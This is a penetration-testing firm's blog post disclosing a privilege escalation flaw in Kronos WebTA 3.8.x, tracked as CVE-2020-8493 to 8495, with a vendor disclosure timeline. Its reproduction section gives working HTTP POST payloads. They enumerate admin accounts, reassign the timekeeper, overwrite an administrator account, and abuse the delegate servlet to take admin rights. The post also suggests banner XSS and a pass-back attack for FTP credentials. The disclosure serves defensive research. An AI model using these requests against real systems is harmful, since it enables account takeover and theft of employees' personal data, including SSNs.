WebTA PrivEsc Vulnerability

Critical WebTA PrivEsc Vulnerability Discovery Details 

This blog covers a recent security vulnerability found by a team of Pen Testers at MindPoint Group during a customer engagement. We’ll walk through the issue descriptions, steps to reproduce the vulnerability, and our recommendations for remediating. 

Common Vulnerability Exploit (CVE): 

  • CVE-2020-8493 
  • CVE-2020-8494 
  • CVE-2020-8495 

Severity: 

  • Risk: High 
  • Difficulty to Exploit: Easy 

Vendor: 

Kronos Web Time and Attendance (WebTA) 

Versions Affected: 

Kronos WebTA 3.8.x and later 3.x versions before 4.0. The latest release of Kronos WebTA is not affected. 

Discovered By:  

Elwood Buck & Nolan Kennedy 

Summary: 

Authenticated remote privilege escalation vulnerability in Kronos WebTA v3.8.x affecting the “com.threeis.webta.H491delegate” servlet allows an attacker with Timekeeper or Supervisor privileges to gain unauthorized administrative privileges within the application. 

Issue Description: 

Privilege escalation occurs when a user gets access to more resources or functionality than they are normally allowed, and the application should have prevented such elevation or changes. A flaw in the application usually causes this. The result is that the user performs actions with more privileges than those intended by the developer or system administrator. 

Steps to Reproduce: 

While testing a timekeeping application, we noticed atypical behavior while manipulating the ‘add user’ function and ‘delegate’ feature. When you have the ability to add new users to an application, it’s worthwhile to check if it’s possible to jump into an elevated role.  

To exploit this vulnerability, you need to have the role of Timekeeper, Master Timekeeper, or HR Admin.  

tkp-menu

There are a few prerequisites before you can move into the administrator role: you will need an: administrator username, administrator id, supervisor name, and to be the timekeeper for the administrator account that you will eventually take over. You can extract the administrator information with the following POST request: 

POST /servlet/com.threeis.webta.H940searchUser HTTP/1.1 

selFunc=search&return_page=com.threeis.webta.P491delegate&return_variable=delegate&search_org=0&search_role=Administrator&actingRole=2&payload_name_0=selFunc&payload_val_0=search&payload_name_1=selRow&payload_name_2=delegate&payload_name_3=delegateRole&payload_val_3=2&payload_name_4=delegatorEmpId&payload_val_4=15667&payload_name_5=delegatorUserId&payload_val_5=username 

Similarly, to extract a supervisor name: 

POST /servlet/com.threeis.webta.H940searchUser HTTP/1.1 

selFunc=search&return_page=com.threeis.webta.P491delegate&return_variable=delegate&search_org=0&search_role=Supervisor&actingRole=2&payload_name_0=selFunc&payload_val_0=search&payload_name_1=selRow&payload_name_2=delegate&payload_name_3=delegateRole&payload_val_3=2&payload_name_4=delegatorEmpId&payload_val_4=15667&payload_name_5=delegatorUserId&payload_val_5=username 

To change the timekeeper: 

POST /servlet/com.threeis.webta.H408chgTkp HTTP/1.1 

selFunc=reassignTkp&uid=<ADMIN_USERNAME> 

Next, we create a new user, including a new username and password, and specify the “emp_id” value as the user id of our target administrator account. Once this request is complete, the original admin account will be overwritten. 

POST /servlet/com.threeis.webta.H402editUser HTTP/1.1 

selFunc=save&rganization=&_mobile_user=&emp_id=<ADMIN_ID_NUM>&ssnvalue=<RANDSOMSSN>&role_orig_tkp=&orig_tkp109=&role_orig_sup=&orig_sup103=&role_orig_mtkp=&orig_mtkp101=&orig_mtkp109=&role_orig_msup=&role_orig_hradmin=&orig_hradmin106=&orig_hradmin107=&userid=<NEW_ATTACKER_USERNAME>&pw1=<NEW_ATTACKER_PASSWORD>1&pw2=<NEW_ATTACKER_PASSWORD>&firstname=EVIL&midname=ADMIN&lastname=ADMIN&ssntext=352-11-1337&supervisor=<SUPERVISOR_USERNAME>&timekeeper=<ATTACKER>&organization=&payperiodcurrent=current&isactive=on 

Logout and login with the new credentials: 

admin-mnu

This technique uses the delegate feature to elevate to admin. To begin, you need to extract an administrator username and ID using the technique outlined above. With the username in hand, make a POST request. We tested different values in the “delegateRole” field to determine which number matched the administrator role: 

POST /servlet/com.threeis.webta.H491delegate HTTP/1.1 

selFunc=add&selRow=&delegate=<ATTACKER>&delegateRole=5&delegatorEmpId=1234&delegatorUserId=<ADMIN> 

Logout, login, and you should be an Admin: 

admin-mnu

As an Admin, you can extract any user’s PII to include names, addresses, and SSNs. If you are looking to use this as a pivot, you can embed XSS into the banner field that appears on every page of the application: 

temp

We leveraged a pass back attack (if you’re unfamiliar with a pass back attack, check out our references at the end of this post) to extract the FTP account information that is used to offload data to an external FTP server: 

The last but most significant ability we found as an admin was to manipulate the mainframe connected to the application. It was out of scope for our engagement, but you can run jobs on the connected mainframe and get code execution! Check out the mainframe post in the references. 

Application logic bugs can be difficult to find from a black box perspective, so make use of the parameter names and don’t be shy when trying to interpret or guess what different parameters might mean without knowing what functions they are passed to.  

Recommendation: 

Follow OWASP’s guidance for privilege escalation 

References: 

How to Hack Through a Pass-Back Attack >

http://www.nolanbkennedy.com/post/privilege-escalation-in-kronos-web-time-and-attendance-webta

https://www.exploit-db.com/exploits/48001

https://www.owasp.org/index.php/Top_10-2017_A5-Broken_Access_Control

https://media.blackhat.com/us-13/US-13-Young-Mainframes-The-Past-Will-Come-Back-to-Haunt-You-WP.pdf

Timeline: 

9/16/2019 – Vendor notified 

9/23/2019 – Patch released and fixes verified 

10/29/2019 – Vendor notified of intent to publicly disclose 

11/4/2019 – Vendor requests modifications to public disclosure content 

Our Pen Testing Services 

The vulnerability listed above was an unknown vulnerability, found during one of our pen testing engagements. MindPoint Group offers a variety of Security Operations services (like pen testing) to help your organization identify and mitigate risk and defend against ever-growing threats. Contact us to learn more.    

Elwood Buck
Latest posts by Elwood Buck (see all)